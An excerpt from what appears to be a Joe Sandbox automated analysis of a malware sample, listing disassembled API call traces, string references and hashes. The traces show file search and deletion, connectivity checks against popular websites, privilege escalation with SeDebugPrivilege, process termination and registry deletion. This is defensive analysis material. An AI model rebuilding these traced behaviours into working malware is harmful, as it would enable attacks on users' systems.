                                                                                                                                                                                                                                                        • Part of subcall function 00413761: lstrlenA.KERNEL32(00000001), ref: 0041379F
                                                                                                                                                                                                                                                      • FindClose.KERNEL32(?), ref: 004073BE
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: lstrlen$Findwsprintf$File$CloseFirstNextSleeplstrcmpilstrcpy
                                                                                                                                                                                                                                                      • String ID: %s\%s$%s\*$.rar$C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\$temp
                                                                                                                                                                                                                                                      • API String ID: 3465626302-3669658814
                                                                                                                                                                                                                                                      • Opcode ID: cf356e47ada7b759430fa3678339e03ff21bf4071e37b1c78863decc56c8ba5b
                                                                                                                                                                                                                                                      • Instruction ID: ccee068b43fa7434496d33a530f361a629b7d78a8a3c796309b93028d32850df
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cf356e47ada7b759430fa3678339e03ff21bf4071e37b1c78863decc56c8ba5b
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C941657290425CABDF209BA5DC48FDA777CEB04304F5004A7FD14E2191EA38AA95CF66
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000005,76AE83C0,76AE8A60,00000000), ref: 00414891
                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 004148AF
                                                                                                                                                                                                                                                      • FindFirstFileA.KERNEL32(?,?), ref: 004148C2
                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 00414905
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 00414946
                                                                                                                                                                                                                                                      • lstrcmpiA.KERNEL32(?,00000000), ref: 0041495F
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,00000000), ref: 00414973
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,0042A3B0), ref: 00414985
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,?), ref: 00414995
                                                                                                                                                                                                                                                      • SetFileAttributesA.KERNEL32(?,00000080), ref: 004149A3
                                                                                                                                                                                                                                                      • DeleteFileA.KERNEL32(?), ref: 004149B0
                                                                                                                                                                                                                                                      • FindNextFileA.KERNEL32(00000000,00000010), ref: 004149BE
                                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 004149CF
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: File$Find$lstrcatwsprintf$AttributesCloseDeleteFirstNextSleeplstrcmpilstrcpylstrlen
                                                                                                                                                                                                                                                      • String ID: %s\%s$%s\*$.
                                                                                                                                                                                                                                                      • API String ID: 2620824442-2663966076
                                                                                                                                                                                                                                                      • Opcode ID: fd92c6bfed2bd7e8c494e1457349e005d97c8806da0db38c392aa86de6e5bc65
                                                                                                                                                                                                                                                      • Instruction ID: 9e4a764dee98d0fe3cbafeb52e22fe68a34b156404d9c119ea68426d0a8c7798
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fd92c6bfed2bd7e8c494e1457349e005d97c8806da0db38c392aa86de6e5bc65
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7A311FB1A0021EABCF21DFA0DD8CFDB777CAB54315F4005A2BA09D2150D6789AA5CF95
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00420500: GetTickCount.KERNEL32 ref: 00420541
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00420B33
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00420B3F
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(000001F4,?,?,?,?,0041EA98,?), ref: 00420B4A
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00420B59
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,?,?,?,?,0041EA98,?), ref: 00420BDC
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,?,?,?,?,0041EA98,?), ref: 00420C00
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,?,?,?,?,0041EA98,?), ref: 00420C24
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,?,?,?,?,0041EA98,?), ref: 00420C48
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,?,?,?,?,0041EA98,?), ref: 00420C6C
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,?,?,?,?,0041EA98,?), ref: 00420C8C
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,?,?,?,?,0041EA98,?), ref: 00420CAC
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,?,?,?,?,0041EA98,?), ref: 00420CCC
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00420D21
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00420D3A
                                                                                                                                                                                                                                                        • Part of subcall function 0042045D: lstrlenA.KERNEL32 ref: 0042048C
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00420DF2
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8,?,?,?,?,0041EA98,?), ref: 00420E0D
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00420E21
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00002710,?,?,?,?,0041EA98,?), ref: 00420E40
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: lstrlen$CountTick$Sleep
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3409765676-0
                                                                                                                                                                                                                                                      • Opcode ID: dd5e2e44a8ca26f335627a2657ddf6542905c81e94c6ef195cb35534abcd3b8d
                                                                                                                                                                                                                                                      • Instruction ID: d9376ad281e1157ce78a842ca65d4016226585deae11d4f2902693360aadc1de
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dd5e2e44a8ca26f335627a2657ddf6542905c81e94c6ef195cb35534abcd3b8d
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A491B1703002204FDB35ABA6A944B2F77D26F55348F95095FE88687353CA6DEC82C71E
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0040C2F4
                                                                                                                                                                                                                                                        • Part of subcall function 0040FB2F: socket.WS2_32(00000002,00000001,00000006), ref: 0040FB65
                                                                                                                                                                                                                                                        • Part of subcall function 0040FB2F: htons.WS2_32(00000050), ref: 0040FB83
                                                                                                                                                                                                                                                        • Part of subcall function 0040FB2F: connect.WS2_32(?,?,00000010), ref: 0040FB96
                                                                                                                                                                                                                                                        • Part of subcall function 0040FB2F: wsprintfA.USER32 ref: 0040FBD0
                                                                                                                                                                                                                                                        • Part of subcall function 0040FB2F: lstrlenA.KERNEL32(?,00000000), ref: 0040FBE3
                                                                                                                                                                                                                                                        • Part of subcall function 0040FB2F: send.WS2_32(?,?,00000000), ref: 0040FBF4
                                                                                                                                                                                                                                                        • Part of subcall function 0040FB2F: select.WS2_32(?,?,00000000,00000000,?), ref: 0040FC3E
                                                                                                                                                                                                                                                        • Part of subcall function 0040FB2F: __WSAFDIsSet.WS2_32(?,00000001), ref: 0040FC4E
                                                                                                                                                                                                                                                        • Part of subcall function 0040FB2F: recv.WS2_32(?,?,00000001,00000000), ref: 0040FC6C
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000BB8), ref: 0040C329
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0040C33E
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CountTick$Sleepconnecthtonslstrlenrecvselectsendsocketwsprintf
                                                                                                                                                                                                                                                      • String ID: www.adobe.com/$www.baidu.com/$www.bbc.co.uk/$www.blogger.com/$www.ebay.com/$www.facebook.com/$www.google.com/$www.imdb.com/$www.myspace.com/$www.wikipedia.org/$www.yahoo.com/$www.youtube.com/
                                                                                                                                                                                                                                                      • API String ID: 3648696511-323873284
                                                                                                                                                                                                                                                      • Opcode ID: 9e277fce805c9b07a1fc8073f56270704cef46285c160d440713ce7cae9850b5
                                                                                                                                                                                                                                                      • Instruction ID: c479cdd90be6b905ce81e7c7198eb54ca4105a7e4ea340f09c4b04c9a81f1d90
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9e277fce805c9b07a1fc8073f56270704cef46285c160d440713ce7cae9850b5
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3A51D132910E247EE753DDBCD8012DBB6676F4E311F4205B1EE05FB120D6F66D4A8A86
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00405B34: EnterCriticalSection.KERNEL32(0044F7E0), ref: 00405B51
                                                                                                                                                                                                                                                        • Part of subcall function 00405B34: GetDesktopWindow.USER32 ref: 00405B68
                                                                                                                                                                                                                                                        • Part of subcall function 00405B34: GetWindowRect.USER32(00000000), ref: 00405B6F
                                                                                                                                                                                                                                                        • Part of subcall function 00405B34: SHDeleteKeyA.SHLWAPI(80000002,00000000), ref: 00405BCA
                                                                                                                                                                                                                                                        • Part of subcall function 00405B34: SHDeleteKeyA.SHLWAPI(80000002,00000000), ref: 00405BEB
                                                                                                                                                                                                                                                        • Part of subcall function 00405B34: RegCreateKeyExA.ADVAPI32(80000002,00000000,00000000,?,00000000), ref: 00405C17
                                                                                                                                                                                                                                                        • Part of subcall function 00405B34: RegDeleteValueA.ADVAPI32(?,00000000), ref: 00405C37
                                                                                                                                                                                                                                                        • Part of subcall function 00405B34: RegCloseKey.ADVAPI32(?), ref: 00405C40
                                                                                                                                                                                                                                                        • Part of subcall function 00405B34: lstrlenA.KERNEL32(?), ref: 00405C70
                                                                                                                                                                                                                                                        • Part of subcall function 00413D4D: GetCurrentProcess.KERNEL32(00000028,0040D4C0,76AF0F00,?,00413DE4,SeShutdownPrivilege,00000001,0040D4C0), ref: 00413D5A
                                                                                                                                                                                                                                                        • Part of subcall function 00413D4D: OpenProcessToken.ADVAPI32(00000000,?,00413DE4,SeShutdownPrivilege,00000001,0040D4C0), ref: 00413D61
                                                                                                                                                                                                                                                        • Part of subcall function 00413D4D: GetCurrentThread.KERNEL32 ref: 00413D74
                                                                                                                                                                                                                                                        • Part of subcall function 00413D4D: OpenThreadToken.ADVAPI32(00000000,?,00413DE4,SeShutdownPrivilege,00000001,0040D4C0), ref: 00413D7B
                                                                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,0040604A,00000000,00000000,00000000), ref: 0040686A
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00406882
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000BB8), ref: 00406899
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 004068AB
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8), ref: 004068BE
                                                                                                                                                                                                                                                      • EnumProcesses.PSAPI(?,00001000,?), ref: 004068D4
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,unknown), ref: 004068FF
                                                                                                                                                                                                                                                      • OpenProcess.KERNEL32(00000411,00000000,?), ref: 0040690E
                                                                                                                                                                                                                                                      • EnumProcessModules.PSAPI(00000000,?,00000004,?), ref: 00406925
                                                                                                                                                                                                                                                      • GetModuleBaseNameA.PSAPI(00000000,?,?,00000104), ref: 0040693F
                                                                                                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 00406969
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00406977
                                                                                                                                                                                                                                                      • EnumWindows.USER32(Function_00005FD0,?), ref: 0040698A
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Process$DeleteEnumOpenThread$CloseCountCreateCurrentSleepTickTokenWindow$BaseCriticalDesktopEnterHandleModuleModulesNameProcessesRectSectionTerminateValueWindowslstrcpylstrlen
                                                                                                                                                                                                                                                      • String ID: SeDebugPrivilege$unknown
                                                                                                                                                                                                                                                      • API String ID: 3286018168-986860467
                                                                                                                                                                                                                                                      • Opcode ID: 108ff26545c37bdedc217c4026fba8dbb628ae02fdcecc6729b986bc4aa78bf2
                                                                                                                                                                                                                                                      • Instruction ID: 9c0e891f918fde1bb4dc23caddae53347e05642ca6a43f5c02609fdc1fd254ea
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 108ff26545c37bdedc217c4026fba8dbb628ae02fdcecc6729b986bc4aa78bf2
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A84154B1A01304ABEB20ABA19D49FEF777CEB04715F514077FA02F11D1DB78A950CA6A
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: +$+$-$-$0$0$0$0$0$1$9$9$9$9$9$9$C$E$c$e
                                                                                                                                                                                                                                                      • API String ID: 0-1153686847
                                                                                                                                                                                                                                                      • Opcode ID: 02161361985eabf86c4be5559b61c19cae477bc12a4973ce681efbc70b554fc2
                                                                                                                                                                                                                                                      • Instruction ID: 13fbb91d17da5591b7639b3a89c7a3a9a2319c12c096657787344311cb77cc90
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 02161361985eabf86c4be5559b61c19cae477bc12a4973ce681efbc70b554fc2
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C2D1C471F571688EEB258B55F8457BE7BB1FB41300FE8402FD441A6292DE7C9982CB0A
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CountTick$Sleep$inet_ntoa
                                                                                                                                                                                                                                                      • String ID: 127$172.16$192.168$255
                                                                                                                                                                                                                                                      • API String ID: 3766371725-1322957428
                                                                                                                                                                                                                                                      • Opcode ID: 6d79fe45ce410cdb1a39a107768565cc25125fac489925a2a0ecbdc1df7054e4
                                                                                                                                                                                                                                                      • Instruction ID: e9ce9212d15bdc9e776c661dfa3e91f858b0d1ee243409a80d1de8cbc0a324b0
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6d79fe45ce410cdb1a39a107768565cc25125fac489925a2a0ecbdc1df7054e4
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E55105B1A083418AE325DB36D88575BBAE45F91308F480C3FE599A32D2DB7CD568C35E
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(?,76AF23A0,00000011), ref: 00406726
                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 00406741
                                                                                                                                                                                                                                                      • FindFirstFileA.KERNEL32(?,?), ref: 00406754
                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 00406798
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,00000028,00000000), ref: 004067BB
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,0042A3B0), ref: 004067CD
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,?), ref: 004067DD
                                                                                                                                                                                                                                                      • SetFileAttributesA.KERNEL32(?,00000080), ref: 004067F8
                                                                                                                                                                                                                                                      • FindNextFileA.KERNEL32(00000000,00000010), ref: 00406820
                                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00406830
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: FileFind$lstrcatwsprintf$AttributesCloseFirstNextSleeplstrcpy
                                                                                                                                                                                                                                                      • String ID: %s\%s$%s\*
                                                                                                                                                                                                                                                      • API String ID: 2421785216-2848263008
                                                                                                                                                                                                                                                      • Opcode ID: 1356115cb3018fa68d5a8994a02ea102dc9683ce23fcc945d1d48d7fca45c0de
                                                                                                                                                                                                                                                      • Instruction ID: 0ecd25e5d59f9a0595605ca4691443b617c16b77e013c2d7aa34b0ccf6123ddf
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1356115cb3018fa68d5a8994a02ea102dc9683ce23fcc945d1d48d7fca45c0de
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 923159B290021DABCF21ABA0DD89FDE777CEB14314F4044A3F905E6050DA749BA5CF55
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000032), ref: 00407D2E
                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 00407D49
                                                                                                                                                                                                                                                      • FindFirstFileA.KERNEL32(?,?), ref: 00407D5C
                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 00407D92
                                                                                                                                                                                                                                                        • Part of subcall function 00407BDB: lstrlenA.KERNEL32(?), ref: 00407BE6
                                                                                                                                                                                                                                                        • Part of subcall function 00407BDB: GetTickCount.KERNEL32 ref: 00407BF1
                                                                                                                                                                                                                                                        • Part of subcall function 00407BDB: lstrcpyA.KERNEL32(?,.rar), ref: 00407CDD
                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 00407DB6
                                                                                                                                                                                                                                                      • FindNextFileA.KERNEL32(00000000,00000010), ref: 00407DD6
